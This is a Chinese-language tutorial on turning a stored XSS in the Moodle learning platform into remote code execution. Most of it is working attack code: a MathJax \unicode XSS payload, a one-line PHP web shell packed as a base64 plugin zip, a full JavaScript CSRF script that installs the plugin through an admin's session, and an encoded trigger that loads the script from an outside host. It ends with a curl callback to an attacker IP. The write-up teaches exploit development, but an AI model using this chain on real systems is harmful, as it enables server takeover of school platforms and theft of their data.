很多同学在挖掘漏洞的中期都会有一个疑问:为什么别人挖到的都是高危或者严重漏洞,而我总是只能挖到一些信息泄露或者常规的XSS呢?来询问这个问题的人其实非常非常多,但其实归根结底都是一个原因,漏洞没有深入利用。所以今天咱们就来学习一下大佬们是怎么利用一个XSS来RCE的思路吧。后续利用RCE的内容比较难,需要有一定编程能力才能比较好理解,所以前面说到漏洞没有深入利用的问题,其原因百分之八十是源于你基础不够扎实,你的“地基”决定了你的高度,所以呀学习千万不能图快学成个脚本小子哦。话不多说,进入正题:
本文所要介绍的测试网站是moodle。什么是moodle?Moodle是一个学习平台或课程管理系统(CMS)-一种免费的开源软件包,旨在帮助教育工作者根据合理的教学原则创建有效的在线课程。您可以在任何方便使用的计算机(包括网络主机)上下载和使用它,但它可以从单个教师站点扩展到200,000名学生的大学。Moodle拥有一个庞大而多样化的用户社区,在全球注册的100,000多个网站中,每个国家/地区使用的语言超过140种。 http://-Moodle.org
开始测试
看一下平台统计信息。
众所周知,Moodle是一款流行的开源软件,吸引了不少网络犯罪分子和脚本小子的目光。相应地,许多开源贡献者也在为他做出更多的安全贡献。
在测试过程中,我们使用Moodle沙盒演示来了解平台的工作原理,并在浏览演示时进行了一些fuzz测试。现在,我们需要做的第一件事是检查平台的角色模型,去更好地了解每个角色的权限。然后,我们进一步下载了该项目的最新版本文件。最终我们决定研究具有最小特权角色的安全性问题(学生)。“学生”的角色已经被设定的权限很小,未被过滤的情况下能做的也只有小部分行为。
一开始,我们通过源代码审计扫描,已经发现了一些问题。但没法很好的利用,可以说这个项目非常成熟且安全设置做的也非常好了。
然后,我们又关注到了权限提升这个问题。从上一个漏洞之后,我们一直处于一个中间的位置,不能再进一步利用,直到我们再一次发现了一个有趣的输入点——资料编辑。
为防止垃圾邮件发送者滥用,平台将隐藏尚未注册任何课程的用户的个人资料描述。所以新用户必须添加至少一门课程才能添加资料信息描述。
所以,我们先创建了一个课程,并让测试“学生”账户加入该课程。并转到以下URL:
http://127.0.0.1/moodle/user/edit.php?id=3&returnto=profile
我们尝试了我们所知道的所有技巧来构造存储型XSS,但是在我更详细地阅读有关Moodle插件系统之后发现,它使用了Mathjax插件过滤器,所以我们的尝试都没有起作用。如果你使用以下格式来创建数学方程式:$$ x=1 $$,那么他呈现出来的就是:
根据SecurityMB的研究,任何小于2.7.4版本的Mathjax都有受到XSS攻击的风险。所以,我们查看了Moodle所使用的Mathjax插件信息,发现Mathjax默认情况下处于打开状态,而且使用的版本是2.7.2!
所以,根据先前已经被披露的攻击payload:$$ \unicode{<img src=1 οnerrοr=alert(1)>} $$
我们实现了在Moodle中创建存储型XSS!
现在我们已经在系统中存储了XSS!这样我们就可以欺骗管理员访问我们的个人资料并触发攻击!
但是,仅仅是弹窗不足以满足这次冒险。我们要将这个漏洞再提升一个层次。
从XSS到RCE
我们已经发现了存储型DOM xss,因此我们可以通过这个漏洞获得cookie,但是Moodle中设置了HTTPonly,因此无法获取管理cookie。而且学校在使用过程中会设置仅支持列入白名单的IP地址可访问,所以我们现在还可以做些什么呢?
在上网的时候,我发现了一个Moodle安装插件远程命令执行的漏洞,这种攻击方式需要一个Admin用户来执行PHP命令,并在Moodle实例上上传shell,所以我们应该可以创建CSRF来做到这一点。
在上传插件之前,需要分多个阶段进行操作,因为它不是一个简单的CSRF页面。我们需要创建一个文件上传CSRF,并在上传CSRF之后创建两个步骤来执行我们的shell。
Ruby中存在一个漏洞利用程序,但它与我们的攻击媒介不同,以下是编写漏洞利用程序时遵循的步骤:
1.创建version.php
并/lang/en/block_rce.php
归档以下内容:
block_rce.php
使用@terjanq shell:
<?= $ _ = '$ <> /' ^ '{{{{' ; $ { $ _ } [ _ ]($ { $ _ } [ __ ]);
version.php
<?php
$ plugin-> version = 2020051300;
$ plugin-> component ='block_rce'
2.压缩2个文件以创建 rce.zip
3.我们应该将文件rce.zip
从二进制格式更改为base64,我们使用了以下代码:
<script>
function onFileLoad(elementId, event) {
document.getElementById(elementId).innerText = event.target.result;
}
function onChooseFile(event, onLoadFileHandler) {
let input = event.target;
let file = input.files[0];
let fr = new FileReader();
fr.onload = onLoadFileHandler;
var fileContent = fr.readAsDataURL(file);
}
</script>
<input type='file' onchange='onChooseFile(event, onFileLoad.bind(this, "contents"))' />
<p id="contents"></p>
<!--
rce.zip to base64
data:application/x-zip-compressed;base64,UEsDBAoAAAAAAHmCuFAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAACLhbhQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACADNoLlQGp+xOCMAAAAoAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsbdVibdVV7Gx01ePU68GAnVrlWqV+Nro+FgNKCM+VtMaAFBLAwQUAAAACACGhbhQ8uNzbUEAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDU0NjCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAAeYK4UAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGABsztMBzjHWAWzO0wHOMdYB7kmh/M0x1gFQSwECHwAKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgA7OKXLc0x1gHs4pctzTHWAcnriynNMdYBUEsBAh8ACgAAAAAAi4W4UAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAORxW27RMdYB5HFbbtEx1gGsuPYszTHWAVBLAQIfABQAAAAIAM2guVAan7E4IwAAACgAAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgAKwWc07Yy1gErBZzTtjLWAWqgKf/MMdYBUEsBAh8AFAAAAAgAhoW4UPLjc21BAAAASQAAAA8AJAAAAAAAAAAgAAAAzQAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAJX8ImnRMdYBlfwiadEx1gF4spXKzDHWAVBLBQYAAAAABQAFANsBAAA7AQAAAAA=
-->
4.编写完整的漏洞利用程序(您可以在此Github存储库中找到它):
const URL = "http://127.0.0.1/moodle/"; // Change this to your target URL
fetch(URL + "admin/tool/installaddon/index.php", {
credentials: "include",
})
.then((res) => {
return res.text();
})
.then((data) => {
let sesskey = data.split('"sesskey":"')[1].split('"')[0];
let itemid = data.split("amp;itemid=")[1].split("&")[0];
let author = data.split('title="View profile">')[1].split("<")[0];
let clientid = data.split('client_id":"')[1].split('"')[0];
// rce.zip
let url =
"data:application/x-zip-compressed;base64,UEsDBAoAAAAAAHmCuFAAAAAAAAAAAAAAAAAEAAAAcmNlL1BLAwQKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAAAHJjZS9sYW5nL1BLAwQKAAAAAACLhbhQAAAAAAAAAAAAAAAADAAAAHJjZS9sYW5nL2VuL1BLAwQUAAAACADNoLlQGp+xOCMAAAAoAAAAGQAAAHJjZS9sYW5nL2VuL2Jsb2NrX3JjZS5waHCzsbdVibdVV7Gx01ePU68GAnVrlWqV+Nro+FgNKCM+VtMaAFBLAwQUAAAACACGhbhQ8uNzbUEAAABJAAAADwAAAHJjZS92ZXJzaW9uLnBocLOxL8goUODlUinIKU3PzNO1K0stKs7Mz1OwVTAyMDIwMDU0NjCwRpJPzs8tyM9LzSsBqlBPyslPzo4vSk5VtwYAUEsBAh8ACgAAAAAAeYK4UAAAAAAAAAAAAAAAAAQAJAAAAAAAAAAQAAAAAAAAAHJjZS8KACAAAAAAAAEAGABsztMBzjHWAWzO0wHOMdYB7kmh/M0x1gFQSwECHwAKAAAAAAC7gbhQAAAAAAAAAAAAAAAACQAkAAAAAAAAABAAAAAiAAAAcmNlL2xhbmcvCgAgAAAAAAABABgA7OKXLc0x1gHs4pctzTHWAcnriynNMdYBUEsBAh8ACgAAAAAAi4W4UAAAAAAAAAAAAAAAAAwAJAAAAAAAAAAQAAAASQAAAHJjZS9sYW5nL2VuLwoAIAAAAAAAAQAYAORxW27RMdYB5HFbbtEx1gGsuPYszTHWAVBLAQIfABQAAAAIAM2guVAan7E4IwAAACgAAAAZACQAAAAAAAAAIAAAAHMAAAByY2UvbGFuZy9lbi9ibG9ja19yY2UucGhwCgAgAAAAAAABABgAKwWc07Yy1gErBZzTtjLWAWqgKf/MMdYBUEsBAh8AFAAAAAgAhoW4UPLjc21BAAAASQAAAA8AJAAAAAAAAAAgAAAAzQAAAHJjZS92ZXJzaW9uLnBocAoAIAAAAAAAAQAYAJX8ImnRMdYBlfwiadEx1gF4spXKzDHWAVBLBQYAAAAABQAFANsBAAA7AQAAAAA=";
fetch(url)
.then((res) => res.blob())
.then((blob) => {
const file = new File([blob], "rce.zip", {
type: "application/x-zip-compressed",
});
myFormData = new FormData();
myFormData.append("title", "");
myFormData.append("author", author);
myFormData.append("license", "allrightsreserved");
myFormData.append("itemid", itemid);
myFormData.append("accepted_types[]", ".zip");
myFormData.append("repo_id", 4);
myFormData.append("p", "");
myFormData.append("page", "");
myFormData.append("env", "filepicker");
myFormData.append("sesskey", sesskey);
myFormData.append("client_id", clientid);
myFormData.append("maxbytes", -1);
myFormData.append("areamaxbytes", -1);
myFormData.append("ctx_id", 1);
myFormData.append("savepath", "/");
myFormData.append("repo_upload_file", file, "rce.zip");
fetch(
URL + "repository/repository_ajax.php?action=upload",
{
method: "post",
body: myFormData,
credentials: "include",
}
)
.then((res) => {
return res.text();
})
.then((res) => {
let zipFile = res.split("draft\\/")[1].split("\\/")[0];
myFormData = new FormData();
myFormData.append("sesskey", sesskey);
myFormData.append(
"_qf__tool_installaddon_installfromzip_form",
1
);
myFormData.append("mform_showmore_id_general", 1);
myFormData.append("mform_isexpanded_id_general", 1);
myFormData.append("zipfile", zipFile);
myFormData.append("plugintype", "block");
myFormData.append("rootdir", "");
myFormData.append(
"submitbutton",
"Install+plugin+from+the+ZIP+file"
);
fetch(
URL + "admin/tool/installaddon/index.php",
{
method: "post",
body: myFormData,
credentials: "include",
}
)
.then((res) => {
return res.text();
})
.then((res) => {
// debugger;
let installzipstorage = res
.split('installzipstorage" value="')[1]
.split('"')[0];
myFormData = new FormData();
myFormData.append("installzipcomponent", "block_rce");
myFormData.append("installzipstorage", installzipstorage);
myFormData.append("installzipconfirm", 1);
myFormData.append("sesskey", sesskey);
fetch(
URL + "admin/tool/installaddon/index.php",
{
method: "post",
body: myFormData,
credentials: "include",
}
).then(() => {
fetch(
URL + "blocks/rce/lang/en/block_rce.php?_=system&__=curl%20http://192.168.153.138:1234/"
);
});
});
});
});
});
5.将此漏洞上传到跨站点主机 http://sandbox.ahussam.me/rce_moodle.js
6.编写触发器MathJax有效负载:
$$ \unicode{<img src='x' onerror='eval(`eval(atob("dmFyIG5ld1NjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpOyBuZXdTY3JpcHQuc3JjID0gImh0dHA6Ly9zYW5kYm94LmFodXNzYW0ubWUvcmNlX21vb2RsZS5qcyI7IG1haW5jb250ZW50LmFwcGVuZENoaWxkKG5ld1NjcmlwdCk7"))`)'>} $$
7.使用先前的有效内容更新配置文件描述。
8.将URL发送给Admin用户并在端口1234上侦听
9.当管理员打开URL时,shell被上传,并且您获得curl连接